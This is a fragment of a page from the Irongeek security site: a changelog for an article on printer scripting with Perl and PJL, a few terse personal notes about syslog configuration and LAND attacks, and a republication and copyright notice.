09/13/2005: Added "Coding your own scripts with Perl and PJL" section.
09/11/2005: First posted.
Irongeek's Notes For Later:
nano /etc/init.d/sysklogd
-r
LAND attacks
If you would like to republish one of the articles from this site on your webpage or print journal please contact
IronGeek.
Copyright 2007, IronGeek